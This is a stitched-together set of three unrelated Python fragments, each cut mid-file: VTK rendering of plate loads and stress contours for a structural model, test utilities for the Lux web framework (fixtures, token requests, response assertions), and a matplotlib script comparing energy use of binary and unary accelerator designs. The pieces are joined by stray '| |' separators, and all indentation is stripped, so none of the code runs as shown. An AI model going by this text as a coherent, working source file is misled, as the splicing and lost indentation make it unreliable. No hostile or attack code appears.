distLoad.lblActors[1].SetCamera(renderer.GetActiveCamera())
# Step through each plate
i = 0
for plate in list(model.Plates.values()) + list(model.Quads.values()):
# Get the direction cosines for the plate's local z-axis
dir_cos = plate.T()[0:3, 0:3]
dir_cos = dir_cos[2]
# Step through each plate load
for load in plate.pressures:
# Determine if this load is part of the requested load combination
if load[1] in load_factors:
# Calculate the factored value for this load
load_value = load[0]*load_factors[load[1]]
# Find the sign for this load. Intercept any divide by zero errors
if load[0] == 0:
sign = 1
else:
sign = abs(load[0])/load[0]
# Find the position of the load's 4 corners
position0 = [plate.i_node.X, plate.i_node.Y, plate.i_node.Z]
position1 = [plate.j_node.X, plate.j_node.Y, plate.j_node.Z]
position2 = [plate.m_node.X, plate.m_node.Y, plate.m_node.Z]
position3 = [plate.n_node.X, plate.n_node.Y, plate.n_node.Z]
# Create an area load and get its data
area_load = VisAreaLoad(position0, position1, position2, position3, dir_cos*sign, abs(load_value)/max_area_load*5*text_height, '{:.3g}'.format(load_value), text_height)
# Add the area load's arrows to the overall load polydata
polydata.AddInputData(area_load.polydata.GetOutput())
# Add the 4 points at the corners of this area load to the list of points
polygon_points.InsertNextPoint(area_load.p0[0], area_load.p0[1], area_load.p0[2])
polygon_points.InsertNextPoint(area_load.p1[0], area_load.p1[1], area_load.p1[2])
polygon_points.InsertNextPoint(area_load.p2[0], area_load.p2[1], area_load.p2[2])
polygon_points.InsertNextPoint(area_load.p3[0], area_load.p3[1], area_load.p3[2])
# Create a polygon based on the four points we just defined.
# The 1st number in `SetId()` is the local point id
# The 2nd number in `SetId()` is the global point id
polygon = vtk.vtkPolygon()
polygon.GetPointIds().SetNumberOfIds(4)
polygon.GetPointIds().SetId(0, i*4)
polygon.GetPointIds().SetId(1, i*4 + 1)
polygon.GetPointIds().SetId(2, i*4 + 2)
polygon.GetPointIds().SetId(3, i*4 + 3)
# Add the polygon to the list of polygons
polygons.InsertNextCell(polygon)
# Add the load label
renderer.AddActor(area_load.label_actor)
# Set the text to follow the camera as the user interacts
area_load.label_actor.SetCamera(renderer.GetActiveCamera())
# `i` keeps track of the next polygon's ID. We've just added a polygon, so `i` needs to
# go up 1.
i += 1
# Create polygon polydata from all the points and polygons we just defined
polygon_polydata.SetPoints(polygon_points)
polygon_polydata.SetPolys(polygons)
# Set up an actor and mapper for the loads
load_mapper = vtk.vtkPolyDataMapper()
load_mapper.SetInputConnection(polydata.GetOutputPort())
load_actor = vtk.vtkActor()
load_actor.GetProperty().SetColor(0, 255, 0) # Green
load_actor.SetMapper(load_mapper)
renderer.AddActor(load_actor)
# Set up an actor and a mapper for the area load polygons
polygon_mapper = vtk.vtkPolyDataMapper()
polygon_mapper.SetInputData(polygon_polydata)
polygon_actor = vtk.vtkActor()
polygon_actor.GetProperty().SetColor(0, 255, 0) # Green
# polygon_actor.GetProperty().SetOpacity(0.5) # 50% opacity
polygon_actor.SetMapper(polygon_mapper)
renderer.AddActor(polygon_actor)
def _RenderContours(model, renderer, deformed_shape, deformed_scale, color_map, scalar_bar, combo_name):
# Create a new `vtkCellArray` object to store the elements
plates = vtk.vtkCellArray()
# Create a `vtkPoints` object to store the coordinates of the corners of the elements
plate_points = vtk.vtkPoints()
# Create 2 lists to store plate results
# `results` will store the results in a Python iterable list
# `plate_results` will store the results in a `vtkDoubleArray` for VTK
results = []
plate_results = vtk.vtkDoubleArray()
plate_results.SetNumberOfComponents(1)
# Each element will be assigned a unique element number `i` beginning at 0
i = 0
# Calculate the smoothed contour results at each node
_PrepContour(model, color_map, combo_name)
# Add each plate and quad in the model to the cell array we just created
for item in list(model.Plates.values()) + list(model.Quads.values()):
# Create a point for each corner (must be in counter clockwise order)
if deformed_shape == True:
p0 = [item.i_node.X + item.i_node.DX[combo_name]*deformed_scale,
item.i_node.Y + item.i_node.DY[combo_name]*deformed_scale,
item.i_node.Z + item.i_node.DZ[combo_name]*deformed_scale]
p1 = [item.j_node.X + item.j_node.DX[combo_name]*deformed_scale,
item.j_node.Y + item.j_node.DY[combo_name]*deformed_scale,
item.j_node.Z + item.j_node.DZ[combo_name]*deformed_scale]
p2 = [item.m_node.X + item.m_node.DX[combo_name]*deformed_scale,
item.m_node.Y + item.m_node.DY[combo_name]*deformed_scale,
item.m_node.Z + item.m_node.DZ[combo_name]*deformed_scale]
p3 = [item.n_node.X + item.n_node.DX[combo_name]*deformed_scale,
item.n_node.Y + item.n_node.DY[combo_name]*deformed_scale,
item.n_node.Z + item.n_node.DZ[combo_name]*deformed_scale]
else:
p0 = [item.i_node.X, item.i_node.Y, item.i_node.Z]
p1 = [item.j_node.X, item.j_node.Y, item.j_node.Z]
p2 = [item.m_node.X, item.m_node.Y, item.m_node.Z]
p3 = [item.n_node.X, item.n_node.Y, item.n_node.Z]
# Add the points to the `vtkPoints` object we created earlier
plate_points.InsertNextPoint(p0)
plate_points.InsertNextPoint(p1)
plate_points.InsertNextPoint(p2)
plate_points.InsertNextPoint(p3)
# Create a `vtkQuad` based on the four points we just defined
# The 1st number in `SetId()` is the local point id
# The 2nd number in `SetId()` is the global point id
quad = vtk.vtkQuad()
quad.GetPointIds().SetId(0, i*4)
quad.GetPointIds().SetId(1, i*4 + 1)
quad.GetPointIds().SetId(2, i*4 + 2)
quad.GetPointIds().SetId(3, i*4 + 3)
# Get the contour value for each node
r0 = item.i_node.contour
r1 = item.j_node.contour
r2 = item.m_node.contour
r3 = item.n_node.contour
if color_map != None:
# Save the results to the Python list of results we created earlier
results.append(r0)
results.append(r1)
results.append(r2)
results.append(r3)
# Save the results to the `vtkDoubleArray` list of results for VTK
plate_results.InsertNextTuple([r0])
plate_results.InsertNextTuple([r1])
plate_results.InsertNextTuple([r2])
plate_results.InsertNextTuple([r3])
# Insert the quad into the cell array
plates.InsertNextCell(quad)
# Increment `i` for the next plate
i += 1
# Create a `vtkPolyData` object to store plate data in
plate_polydata = vtk.vtkPolyData()
# Add the points and plates to the dataset
plate_polydata.SetPoints(plate_points)
plate_polydata.SetPolys(plates)
# Setup actor and mapper for the plates
plate_mapper = vtk.vtkPolyDataMapper()
plate_mapper.SetInputData(plate_polydata)
plate_actor = vtk.vtkActor()
plate_actor.SetMapper(plate_mapper)
# Map the results to the plates
if color_map != None:
plate_polydata.GetPointData().SetScalars(plate_results)
# Create a `vtkLookupTable` for the colors used to map results
lut = vtk.vtkLookupTable()
lut.SetTableRange(min(results), max(results))
lut.SetNumberOfColors(256)
# The commented code below can be uncommented and modified to change the color scheme
# ctf = vtk.vtkColorTransferFunction()
# ctf.SetColorSpaceToDiverging()
# ctf.AddRGBPoint(min(results), 255, 0, 255) # Purple
# ctf.AddRGBPoint(max(results), 255, 0, 0) # Red
# for i in range(256):
# rgb = list(ctf.GetColor(float(i)/256))
# rgb.append(1.0)
# lut.SetTableValue(i, *rgb)
plate_mapper.SetLookupTable(lut)
plate_mapper.SetUseLookupTableScalarRange(True)
plate_mapper.SetScalarModeToUsePointData()
lut.Build()
# Add the scalar bar for the contours.
# Note: After searching online for how to change the font size for the scalar bar label text,
# I found that the text automatically sizes itself to the size of the scalar bar. VTK provides
# no other controls over the text size. The `vtkTextProperty` commented out below is normally
# how text size is controlled in VTK. All the lines of code excecute without an exception, but
# the text size is unaffected. The `SetMaximumWidthInPixels` function provides some control
# over the text size until the window gets too small.
if scalar_bar:
scalar = vtk.vtkScalarBarActor()
# scalar_text = vtk.vtkTextProperty()
# scalar_text.SetFontSize(12)
# scalar_bar.SetLabelTextProperty(scalar_text)
scalar.SetLookupTable(lut)
scalar.SetMaximumWidthInPixels(100)
renderer.AddActor(scalar)
# Add the actor for the plates
renderer.AddActor(plate_actor)
def _MaxLoads(model, combo_name=None, case=None):
max_pt_load = 0
max_moment = 0
max_dist_load = 0
max_area_load = 0
# Find the requested load combination or load case
if case == None:
# Step through each node
for node in model.Nodes.values():
# | |
"""Utilities for testing Lux applications"""
import os
import unittest
import string
import logging
import pickle
from asyncio import get_event_loop
from collections import OrderedDict
from unittest import mock
from io import StringIO
from pulsar.api import as_coroutine
from pulsar.utils.httpurl import remove_double_slash
from pulsar.utils.string import random_string
from pulsar.utils.websocket import frame_parser
from pulsar.apps.wsgi import WsgiResponse
from pulsar.utils.system import json as _json
from pulsar.apps.test import test_timeout, sequential, test_wsgi_request
from pulsar.apps.greenio import wait, run_in_greenlet
from lux.core import App, AppClient
from lux.core.commands.generate_secret_key import generate_secret
from lux.utils import context
from .token import app_token
logger = logging.getLogger('pulsar.test')
__all__ = ['TestCase',
'AppTestCase',
'WebApiTestCase',
'load_fixtures',
'randomname',
'green',
'sequential',
'test_timeout']
def randomname(prefix=None, len=8):
"""Generate a random name with a prefix (default to ``luxtest-``)
"""
prefix = prefix if prefix is not None else 'luxtest-'
name = random_string(min_len=len, max_len=len,
characters=string.ascii_letters)
return ('%s%s' % (prefix, name)).lower()
def wsgi_request_from_app(app, **kw):
request = wait(test_wsgi_request(**kw))
app.on_request(request)
return request
def green(test_fun):
"""Decorator to run a test function in the lux application green_pool
if available, otherwise in the event loop executor.
In both cases it returns a :class:`~asyncio.Future`.
This decorator should not be used for functions returning an
awaitable.
"""
@run_in_greenlet
def _(test):
context.set_app(getattr(test, 'app', None))
return test_fun(test)
return _
def test_app(test, config_file=None, config_params=True, argv=None, **params):
"""Return an application for testing. Override if needed.
"""
if config_params:
kwargs = test.config_params.copy()
kwargs.update(params)
else:
kwargs = params
config_file = config_file or test.config_file
if argv is None:
argv = []
if '--log-level' not in argv:
argv.append('--log-level')
levels = test.cfg.log_level if hasattr(test, 'cfg') else ['none']
argv.extend(levels)
app = App(config_file, argv=argv, cfg=test.cfg, **kwargs).setup()
if app.config['SECRET_KEY'] == 'secret-key':
app.config['SECRET_KEY'] = generate_secret()
app.stdout = StringIO()
app.stderr = StringIO()
assert app.request_handler()
return app
@green
def create_users(app, items, testuser, index=None):
if not index:
items.insert(0, {
"username": testuser,
"password": <PASSWORD>,
"superuser": True,
"active": True
})
logger.debug('Creating %d users', len(items))
request = wsgi_request_from_app(app)
processed = set()
with app.models['users'].session(request) as session:
for params in items:
if params.get('username') in processed:
continue
user = session.auth.create_user(session, **params)
if user:
processed.add(user.username)
return len(processed)
async def load_fixtures(app, path=None, api_url=None, testuser=None,
admin_jwt=None):
"""Load fixtures
This function requires an authentication backend supporting user creation
"""
testuser = testuser or 'testuser'
fpath = path if path else os.path.join(app.meta.path, 'fixtures')
total = 0
if not os.path.isdir(fpath):
if path:
logger.error('Could not find %s path for fixtures', path)
return total
api_url = api_url or ''
if api_url.endswith('/'):
api_url = api_url[:-1]
client = AppClient.create(app, False)
test = TestCase()
test_tokens = {}
for index, fixtures in enumerate(_read_fixtures(fpath)):
total += await create_users(
app, fixtures.pop('users', []), testuser, index
)
for name, items in fixtures.items():
logger.info('%d fixtures for "%s"', len(items), name)
for params in items:
user = params.pop('api_user', testuser)
if user not in test_tokens:
response = await client.post(
'%s/authorizations' % api_url,
json=dict(username=user, password=<PASSWORD>),
jwt=admin_jwt
)
token = test.json(response, 201)['id']
test_tokens[user] = token
test_token = test_tokens[user]
url = '%s%s' % (api_url, params.pop('api_url', '/%s' % name))
method = params.pop('api_method', 'post')
#
# Allow to patch an existing model
if method == 'patch' and name in app.models:
url = '%s/%s' % (
url, params.pop(app.models[name].id_field)
)
response = await client.request(method, url, json=params,
token=test_token)
data = test.json(response)
code = response.status_code
if code > 201:
raise AssertionError('%s api call got %d: %s' %
(url, code, data))
total += 1
logger.info('Created %s objects', total)
class TestMixin:
app = None
"""Test class application"""
config_file = 'tests.config'
"""The config file to use when building an :meth:`application`"""
config_params = {}
"""Dictionary of parameters to override parameters from
:attr:`config_file`
"""
prefixdb = 'testlux_'
def authenticity_token(self, doc):
name = doc.find('meta', attrs={'name': 'csrf-param'})
value = doc.find('meta', attrs={'name': 'csrf-token'})
if name and value:
name = name.attrs['content']
value = value.attrs['content']
return {name: value}
def cookie(self, response):
"""Extract a cookie from the response if available
"""
headers = response.get_headers()
return dict(headers).get('Set-Cookie')
def bs(self, response, status_code=None, mode=None):
"""Return a BeautifulSoup object from the ``response``
"""
from bs4 import BeautifulSoup
return BeautifulSoup(self.html(response, status_code),
'html.parser')
def html(self, response, status_code=None):
"""Get html/text content from response
"""
if status_code:
self.assertEqual(response.status_code, status_code)
self.assertEqual(response.headers['Content-Type'],
'text/html; charset=utf-8')
return response.text
def text(self, response, status_code=None):
"""Get JSON object from response
"""
if status_code:
self.assertEqual(response.status_code, status_code)
self.assertEqual(response.headers['Content-Type'],
'text/plain; charset=utf-8')
return response.text
def json(self, response, status_code=None):
"""Get JSON object from response
"""
if status_code:
self.assertEqual(response.status_code, status_code)
self.assertEqual(response.headers['Content-Type'],
'application/json; charset=utf-8')
return response.json()
def xml(self, response, status_code=None):
"""Get JSON object from response
"""
from bs4 import BeautifulSoup
if status_code:
self.assertEqual(response.status_code, status_code)
self.assertEqual(response.headers['Content-Type'],
'application/xml; charset=utf-8')
return BeautifulSoup(response.text, 'xml')
def empty(self, response, status_code=None):
"""Get JSON object from response
"""
if status_code:
self.assertEqual(response.status_code, status_code)
self.assertFalse(response.content)
def ws_upgrade(self, response):
from lux.ext.sockjs import LuxWs
self.assertEqual(response.status_code, 101)
#
connection = response.connection
upgrade = connection.upgrade
self.assertTrue(upgrade.called)
websocket = upgrade.call_args[0][0](get_event_loop())
connection.reset_mock()
#
self.assertIsInstance(websocket.handler, LuxWs)
websocket._connection = response.connection
websocket.connection_made(response.connection)
self.assertTrue(websocket.cache.wsclient)
websocket.cache.wsclient.logger = mock.MagicMock()
return websocket
def ws_message(self, **params):
msg = _json.dumps(params)
return _json.dumps([msg])
def get_ws_message(self, websocket):
mock = websocket.connection.write
self.assertTrue(mock.called)
frame = mock.call_args[0][0]
return self.parse_frame(websocket, frame)
def parse_frame(self, websocket, frame):
parser = frame_parser(kind=1)
frame = parser.decode(frame)
wsclient = websocket.cache.wsclient
websocket.connection.reset_mock()
msg = _json.loads(frame.body[1:])[0]
return wsclient.protocol.decode(msg)
def assertValidationError(self, response, field=None, text=None):
"""Assert a Form validation error
"""
if isinstance(response, WsgiResponse):
self.assertEqual(response.status_code, 422)
data = self.json(response)
else:
data = response
self.assertTrue(data['error'])
errors = dict(((d['field'], d['message'])
for d in data.get('errors', ())))
errors[''] = data.get('message')
msg = errors.get(field or '')
if field is not None:
self.assertTrue(msg)
if text:
self.assertEqual(msg, text)
def check401(self, response):
self.json(response, 401)
self.assertEqual(response.headers['WWW-Authenticate'], 'Token')
def checkOptions(self, response, methods=None):
self.assertEqual(response.status_code, 200)
self.assertTrue('Access-Control-Allow-Origin' in response.headers)
methods_header = response.headers['Access-Control-Allow-Methods']
headers = set(methods_header.split(', '))
if methods:
self.assertEqual(set(methods), headers)
def check_og_meta(self, bs, type=None, image=None):
meta = bs.find('meta', property='og:type')
self.assertEqual(meta['content'], type or 'website')
#
if image:
meta = bs.find('meta', property='og:image')
self.assertEqual(meta['content'], image)
class TestCase(unittest.TestCase, TestMixin):
"""TestCase class for lux tests.
It provides several utilities methods.
"""
apps = None
def application(self, **params):
"""Return an application for testing. Override if needed.
"""
app = test_app(self, **params)
if self.apps is None:
self.apps = []
self.apps.append(app)
return app
@classmethod
def app_client(cls, app):
return AppClient.create(app, False)
class AppTestCase(unittest.TestCase, TestMixin):
"""Test class for testing a single application
"""
fixtures_path = None
"""path to fixtures"""
odm = None
"""Original odm handler"""
datastore = None
"""Test class datastore dictionary"""
_test = TestCase()
@classmethod
async def setUpClass(cls):
# Create the application
cls.dbs = {}
cls.app = cls.create_test_application()
cls.client = cls.get_client()
if hasattr(cls.app, 'odm'):
# Store the original odm for removing the new databases
cls.odm = cls.app.odm
await cls.setupdb()
# admin JWT token for admin operations on Token auth backends
cls.admin_jwt = await as_coroutine(cls.create_admin_jwt())
await cls.populatedb()
await cls.beforeAll()
@classmethod
async def tearDownClass(cls):
if cls.odm:
await cls.dropdb()
await cls.afterAll()
@classmethod
def get_client(cls):
return AppClient.create(cls.app, False)
@classmethod
def create_test_application(cls):
"""Return the lux application"""
return test_app(cls)
@classmethod
def create_admin_jwt(cls):
"""Return the lux application"""
return app_token(cls.app)
@classmethod
def dbname(cls, engine):
if engine not in cls.dbs:
cls.dbs[engine] = randomname(cls.prefixdb)
return cls.dbs[engine]
@classmethod
@green
def setupdb(cls):
cls.app.odm = cls.odm.database_create(database=cls.dbname)
odm = cls.app.odm()
DATASTORE = cls.app.config['DATASTORE']
if not isinstance(DATASTORE, dict):
DATASTORE = {'default': DATASTORE}
#
# Replace datastores with temporary ones for this test class
cls.datastore = {}
for original_engine, database in cls.dbs.items():
orig_url = str(original_engine.url)
for engine in odm.engines():
if engine.url.database == database:
new_url = str(engine.url)
for key, url in DATASTORE.items():
if url == orig_url:
cls.datastore[key] = new_url
cls.app.config['DATASTORE'] = cls.datastore
cls.app.params['DATASTORE'] = cls.datastore
cls.table_create()
@classmethod
def table_create(cls):
cls.app.odm().table_create()
@classmethod
@green
def dropdb(cls):
cls.app.odm().close()
cls.odm().database_drop(database=cls.dbname)
@classmethod
async def populatedb(cls):
return load_fixtures(cls.app,
path=cls.fixtures_path,
api_url=cls.api_url(),
admin_jwt=cls.admin_jwt)
@classmethod
def api_url(cls, path=None):
if 'API_URL' in cls.app.config:
url = cls.app.config['API_URL']
return remove_double_slash('%s/%s' % (url, path)) if path else url
@classmethod
def clone_app(cls):
sapp = pickle.dumps(cls.app.callable)
app = pickle.loads(sapp).setup(handler=False)
if cls.datastore:
app.config['DATASTORE'] = cls.datastore
return TestApp(app)
@classmethod
async def beforeAll(cls):
"""Can be used to add logic before all tests"""
@classmethod
async def afterAll(cls):
"""Can be used to add logic after all tests"""
@classmethod
async def user_token(cls, credentials, **kw):
'''Return a token for a user
'''
if isinstance(credentials, str):
credentials = {"username": credentials,
"password": <PASSWORD>}
# Get new token
response = await cls.client.post(cls.api_url('authorizations'),
json=credentials, **kw)
test = cls._test
data = test.json(response, 201)
test.assertTrue('id' in data)
test.assertTrue('expiry' in data)
test.assertTrue(data['session'])
user = response.wsgi_request.cache.user
test.assertTrue(user.is_anonymous())
return data['id']
def create_superuser(self, username, email, password):
"""A shortcut for the create_superuser command
"""
return self.client.run_command('create_superuser',
['--username', username,
'--email', email,
'--password', password])
class WebApiTestCase(AppTestCase):
"""Test case for an api-web application pair
"""
web_config_file = None
web_config_params | |
- total_energy_list_bs_spm[i]/total_energy_list_bp_spm[i])
# 8b - wospm - ur - 32c
index = 2
dram_d_list = energy_list[index * 5 + 0][-1:]
sram_d_list = energy_list[index * 5 + 1][-1:]
sram_l_list = energy_list[index * 5 + 2][-1:]
sarr_d_list = energy_list[index * 5 + 3][-1:]
sarr_l_list = energy_list[index * 5 + 4][-1:]
total_energy_list_u6_wspm = []
onchip_energy_list_u6_wspm = []
for i in range(len(x_axis)):
total_energy_list_u6_wspm.append(dram_d_list[i] + sram_d_list[i] + sram_l_list[i] + sarr_d_list[i] + sarr_l_list[i])
onchip_energy_list_u6_wspm.append(sram_d_list[i] + sram_l_list[i] + sarr_d_list[i] + sarr_l_list[i])
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), total_energy_list_u6_wspm, width, hatch = None, alpha=0.99, color=u6_color, label='Unary-32c')
onchip_energy_r_list_u6_wspm = []
for i in range(len(x_axis)):
onchip_energy_r_list_u6_wspm.append(1-onchip_energy_list_u6_wspm[i]/onchip_energy_list_bp_spm[i])
total_energy_r_list_u6_wspm = []
for i in range(len(x_axis)):
total_energy_r_list_u6_wspm.append(1 - total_energy_list_u6_wspm[i]/total_energy_list_bp_spm[i])
# 8b - wospm - ur - 64c
index = 3
dram_d_list = energy_list[index * 5 + 0][-1:]
sram_d_list = energy_list[index * 5 + 1][-1:]
sram_l_list = energy_list[index * 5 + 2][-1:]
sarr_d_list = energy_list[index * 5 + 3][-1:]
sarr_l_list = energy_list[index * 5 + 4][-1:]
total_energy_list_u7_wspm = []
onchip_energy_list_u7_wspm = []
for i in range(len(x_axis)):
total_energy_list_u7_wspm.append(dram_d_list[i] + sram_d_list[i] + sram_l_list[i] + sarr_d_list[i] + sarr_l_list[i])
onchip_energy_list_u7_wspm.append(sram_d_list[i] + sram_l_list[i] + sarr_d_list[i] + sarr_l_list[i])
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), total_energy_list_u7_wspm, width, hatch = None, alpha=0.99, color=u7_color, label='Unary-64c')
onchip_energy_r_list_u7_wspm = []
for i in range(len(x_axis)):
onchip_energy_r_list_u7_wspm.append(1-onchip_energy_list_u7_wspm[i]/onchip_energy_list_bp_spm[i])
total_energy_r_list_u7_wspm = []
for i in range(len(x_axis)):
total_energy_r_list_u7_wspm.append(1 - total_energy_list_u7_wspm[i]/total_energy_list_bp_spm[i])
# 8b - wospm - ur - 128c
index = 4
dram_d_list = energy_list[index * 5 + 0][-1:]
sram_d_list = energy_list[index * 5 + 1][-1:]
sram_l_list = energy_list[index * 5 + 2][-1:]
sarr_d_list = energy_list[index * 5 + 3][-1:]
sarr_l_list = energy_list[index * 5 + 4][-1:]
total_energy_list_u8_wspm = []
onchip_energy_list_u8_wspm = []
for i in range(len(x_axis)):
total_energy_list_u8_wspm.append(dram_d_list[i] + sram_d_list[i] + sram_l_list[i] + sarr_d_list[i] + sarr_l_list[i])
onchip_energy_list_u8_wspm.append(sram_d_list[i] + sram_l_list[i] + sarr_d_list[i] + sarr_l_list[i])
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), total_energy_list_u8_wspm, width, hatch = None, alpha=0.99, color=u8_color, label='Unary-128c')
onchip_energy_r_list_u8_wspm = []
for i in range(len(x_axis)):
onchip_energy_r_list_u8_wspm.append(1-onchip_energy_list_u8_wspm[i]/onchip_energy_list_bp_spm[i])
total_energy_r_list_u8_wspm = []
for i in range(len(x_axis)):
total_energy_r_list_u8_wspm.append(1 - total_energy_list_u8_wspm[i]/total_energy_list_bp_spm[i])
# 8b - wospm - ug - 256c
index = 5
dram_d_list = energy_list[index * 5 + 0][-1:]
sram_d_list = energy_list[index * 5 + 1][-1:]
sram_l_list = energy_list[index * 5 + 2][-1:]
sarr_d_list = energy_list[index * 5 + 3][-1:]
sarr_l_list = energy_list[index * 5 + 4][-1:]
total_energy_list_ug_wspm = []
onchip_energy_list_ug_wspm = []
for i in range(len(x_axis)):
total_energy_list_ug_wspm.append(dram_d_list[i] + sram_d_list[i] + sram_l_list[i] + sarr_d_list[i] + sarr_l_list[i])
onchip_energy_list_ug_wspm.append(sram_d_list[i] + sram_l_list[i] + sarr_d_list[i] + sarr_l_list[i])
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), total_energy_list_ug_wspm, width, hatch = None, alpha=0.99, color=ug_color, label='uGEMM-H')
onchip_energy_r_list_ug_wspm = []
for i in range(len(x_axis)):
onchip_energy_r_list_ug_wspm.append(1-onchip_energy_list_ug_wspm[i]/onchip_energy_list_bp_spm[i])
total_energy_r_list_ug_wspm = []
for i in range(len(x_axis)):
total_energy_r_list_ug_wspm.append(1 - total_energy_list_ug_wspm[i]/total_energy_list_bp_spm[i])
ax.set_ylabel('Total energy\n(uJ)')
ax.set_xticks(x_idx)
ax.set_xticklabels(x_axis)
plt.xlim(x_idx[0]-0.5, x_idx[-1]+0.5)
plt.yscale("log")
_, top = plt.ylim()
locs, labels = plt.yticks()
if a == "eyeriss":
locs = locs[1:]
else:
locs = locs[1:]
ax.set_yticks(locs)
bottom, _ = plt.ylim()
if a == "eyeriss":
ax.set_ylim((bottom, top))
bottom, top = plt.ylim()
for x in x_idx:
ax.fill_betweenx([bottom, top], x1=x, x2=x+0.5, alpha=0.2, color=bg_color, linewidth=0)
else:
ax.set_ylim((bottom, top))
bottom, top = plt.ylim()
for x in x_idx:
ax.fill_betweenx([bottom, top], x1=x, x2=x+0.5, alpha=0.2, color=bg_color, linewidth=0)
y_label_list = []
for y in locs:
if y != 0:
y_label_list.append("{:1.0E}".format(abs(y)))
else:
y_label_list.append("0")
ax.set_yticklabels(y_label_list)
ax.minorticks_off()
fig.tight_layout()
plt.savefig('./outputs_fig/' + technode + '/Energy_total_' + a_cap + ".pdf", bbox_inches='tight', dpi=my_dpi, pad_inches=0.02)
if print_energy_onchip:
print("On-chip energy reduction: ")
print("binary parallel (baseline):", onchip_energy_list_bp_spm)
print("binary serial :", onchip_energy_r_list_bs_spm)
print("unary 32c :", onchip_energy_r_list_u6_wspm)
print("unary 64c :", onchip_energy_r_list_u7_wspm)
print("unary 128c :", onchip_energy_r_list_u8_wspm)
print("ugemm 256c :", onchip_energy_r_list_ug_wspm)
print("min reduction:", min(onchip_energy_r_list_u6_wspm + onchip_energy_r_list_u7_wspm + onchip_energy_r_list_u8_wspm)*100, "%")
print("mean reduction:", mean(onchip_energy_r_list_u6_wspm + onchip_energy_r_list_u7_wspm + onchip_energy_r_list_u8_wspm)*100, "%")
print("median reduction:", median(onchip_energy_r_list_u6_wspm + onchip_energy_r_list_u7_wspm + onchip_energy_r_list_u8_wspm)*100, "%")
print("max reduction:", max(onchip_energy_r_list_u6_wspm + onchip_energy_r_list_u7_wspm + onchip_energy_r_list_u8_wspm)*100, "%")
onchip_energy_bs_r_list_u6_wspm = []
onchip_energy_bs_r_list_u7_wspm = []
onchip_energy_bs_r_list_u8_wspm = []
onchip_energy_bs_r_list_ug_wspm = []
for i in range(len(onchip_energy_list_bs_spm)):
onchip_energy_bs_r_list_u6_wspm.append(1 - onchip_energy_list_u6_wspm[i] / onchip_energy_list_bs_spm[i])
onchip_energy_bs_r_list_u7_wspm.append(1 - onchip_energy_list_u7_wspm[i] / onchip_energy_list_bs_spm[i])
onchip_energy_bs_r_list_u8_wspm.append(1 - onchip_energy_list_u8_wspm[i] / onchip_energy_list_bs_spm[i])
onchip_energy_bs_r_list_ug_wspm.append(1 - onchip_energy_list_ug_wspm[i] / onchip_energy_list_bs_spm[i])
print("binary serial (baseline) :", onchip_energy_list_bs_spm)
print("unary 32c :", onchip_energy_bs_r_list_u6_wspm)
print("unary 64c :", onchip_energy_bs_r_list_u7_wspm)
print("unary 128c :", onchip_energy_bs_r_list_u8_wspm)
print("ugemm 256c :", onchip_energy_bs_r_list_ug_wspm)
print("min reduction:", min(onchip_energy_bs_r_list_u6_wspm + onchip_energy_bs_r_list_u7_wspm + onchip_energy_bs_r_list_u8_wspm)*100, "%")
print("mean reduction:", mean(onchip_energy_bs_r_list_u6_wspm + onchip_energy_bs_r_list_u7_wspm + onchip_energy_bs_r_list_u8_wspm)*100, "%")
print("median reduction:", median(onchip_energy_bs_r_list_u6_wspm + onchip_energy_bs_r_list_u7_wspm + onchip_energy_bs_r_list_u8_wspm)*100, "%")
print("max reduction:", max(onchip_energy_bs_r_list_u6_wspm + onchip_energy_bs_r_list_u7_wspm + onchip_energy_bs_r_list_u8_wspm)*100, "%")
if print_energy_total:
print("Total energy reduction: ")
print("binary parallel (baseline):", total_energy_list_bp_spm)
print("binary serial :", total_energy_r_list_bs_spm)
print("unary 32c :", total_energy_r_list_u6_wspm)
print("unary 64c :", total_energy_r_list_u7_wspm)
print("unary 128c :", total_energy_r_list_u8_wspm)
print("ugemm 256c :", total_energy_r_list_ug_wspm)
print("min reduction:", min(total_energy_r_list_u6_wspm + total_energy_r_list_u7_wspm + total_energy_r_list_u8_wspm)*100, "%")
print("mean reduction:", mean(total_energy_r_list_u6_wspm + total_energy_r_list_u7_wspm + total_energy_r_list_u8_wspm)*100, "%")
print("median reduction:", median(total_energy_r_list_u6_wspm + total_energy_r_list_u7_wspm + total_energy_r_list_u8_wspm)*100, "%")
print("max reduction:", max(total_energy_r_list_u6_wspm + total_energy_r_list_u7_wspm + total_energy_r_list_u8_wspm)*100, "%")
total_energy_bs_r_list_u6_wspm = []
total_energy_bs_r_list_u7_wspm = []
total_energy_bs_r_list_u8_wspm = []
total_energy_bs_r_list_ug_wspm = []
for i in range(len(total_energy_list_bs_spm)):
total_energy_bs_r_list_u6_wspm.append(1 - total_energy_list_u6_wspm[i] / total_energy_list_bs_spm[i])
total_energy_bs_r_list_u7_wspm.append(1 - total_energy_list_u7_wspm[i] / total_energy_list_bs_spm[i])
total_energy_bs_r_list_u8_wspm.append(1 - total_energy_list_u8_wspm[i] / total_energy_list_bs_spm[i])
total_energy_bs_r_list_ug_wspm.append(1 - total_energy_list_ug_wspm[i] / total_energy_list_bs_spm[i])
print("binary serial (baseline) :", total_energy_list_bs_spm)
print("unary 32c :", total_energy_bs_r_list_u6_wspm)
print("unary 64c :", total_energy_bs_r_list_u7_wspm)
print("unary 128c :", total_energy_bs_r_list_u8_wspm)
print("ugemm 256c :", total_energy_bs_r_list_ug_wspm)
print("min reduction:", min(total_energy_bs_r_list_u6_wspm + total_energy_bs_r_list_u7_wspm + total_energy_bs_r_list_u8_wspm)*100, "%")
print("mean reduction:", mean(total_energy_bs_r_list_u6_wspm + total_energy_bs_r_list_u7_wspm + total_energy_bs_r_list_u8_wspm)*100, "%")
print("median reduction:", median(total_energy_bs_r_list_u6_wspm + total_energy_bs_r_list_u7_wspm + total_energy_bs_r_list_u8_wspm)*100, "%")
print("max reduction:", max(total_energy_bs_r_list_u6_wspm + total_energy_bs_r_list_u7_wspm + total_energy_bs_r_list_u8_wspm)*100, "%")
# energy eff
onchip_energy_eff_list_bp_spm = []
onchip_energy_eff_list_bs_spm = []
onchip_energy_eff_list_u6_wspm = []
onchip_energy_eff_list_u7_wspm = []
onchip_energy_eff_list_u8_wspm = []
onchip_energy_eff_list_ug_wspm = []
total_energy_eff_list_bp_spm = []
total_energy_eff_list_bs_spm = []
total_energy_eff_list_u6_wspm = []
total_energy_eff_list_u7_wspm = []
total_energy_eff_list_u8_wspm = []
total_energy_eff_list_ug_wspm = []
